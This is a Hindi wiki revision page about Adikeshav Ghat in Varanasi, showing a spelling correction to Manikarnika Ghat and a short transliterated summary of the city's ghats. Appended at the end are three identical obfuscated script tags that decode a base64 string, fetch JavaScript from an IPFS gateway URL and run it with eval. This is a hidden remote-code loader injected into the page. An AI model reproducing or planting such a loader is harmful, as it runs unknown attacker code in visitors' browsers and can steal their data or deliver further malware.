Difference between revisions of "आदिकेशव घाट वाराणसी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replacement - "मणिकार्णिका घाट" to "मणिकर्णिका घाट")
 
Line 5: Line 5:
 
*[[वाराणसी]] ([[काशी]]) में गंगा [[तट]]  पर अनेक सुंदर घाट बने हैं, ये सभी घाट किसी न किसी पौराणिक या धार्मिक कथा से संबंधित हैं।
 
*[[वाराणसी]] ([[काशी]]) में गंगा [[तट]]  पर अनेक सुंदर घाट बने हैं, ये सभी घाट किसी न किसी पौराणिक या धार्मिक कथा से संबंधित हैं।
 
*वाराणसी में लगभग 84 घाट हैं। ये घाट लगभग 4 मील लम्‍बे तट पर बने हुए हैं।  
 
*वाराणसी में लगभग 84 घाट हैं। ये घाट लगभग 4 मील लम्‍बे तट पर बने हुए हैं।  
*[[वाराणसी के घाट|वाराणसी के 84 घाटों]] में पाँच घाट बहुत ही पवित्र माने जाते हैं। इन्‍हें सामूहिक रूप से 'पंचतीर्थ' कहा जाता है। ये हैं [[असी घाट वाराणसी|असी घाट]], [[दशाश्वमेध घाट वाराणसी|दशाश्वमेध घाट]], आदिकेशव घाट, [[पंचगंगा घाट वाराणसी|पंचगंगा घाट]] तथा [[मणिकार्णिका घाट वाराणसी|मणिकार्णिका घाट]]।
+
*[[वाराणसी के घाट|वाराणसी के 84 घाटों]] में पाँच घाट बहुत ही पवित्र माने जाते हैं। इन्‍हें सामूहिक रूप से 'पंचतीर्थ' कहा जाता है। ये हैं [[असी घाट वाराणसी|असी घाट]], [[दशाश्वमेध घाट वाराणसी|दशाश्वमेध घाट]], आदिकेशव घाट, [[पंचगंगा घाट वाराणसी|पंचगंगा घाट]] तथा [[मणिकर्णिका घाट वाराणसी|मणिकर्णिका घाट]]।
  
 
==संबंधित लेख==
 
==संबंधित लेख==

Latest revision as of 10:11, 2 November 2016

adikeshav ghat varanasi mean sthit ganga nadi ka ek ghat hai.

  • adikeshav ghat varuna v ganga ke sangam par sthit hai.
  • yahaan sangameshvar v brahmeshvar mandir darshaniy haian.
  • isake alava gay ghat, lal ghat, siandhiya ghat adi kashi ke sauandary ko udbhashit karate haian.
  • varanasi (kashi) mean ganga tat par anek suandar ghat bane haian, ye sabhi ghat kisi n kisi pauranik ya dharmik katha se sanbandhit haian.
  • varanasi mean lagabhag 84 ghat haian. ye ghat lagabhag 4 mil lamh‍be tat par bane hue haian.
  • varanasi ke 84 ghatoan mean paanch ghat bahut hi pavitr mane jate haian. inh‍hean samoohik roop se 'panchatirth' kaha jata hai. ye haian asi ghat, dashashvamedh ghat, adikeshav ghat, panchaganga ghat tatha manikarnika ghat.

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>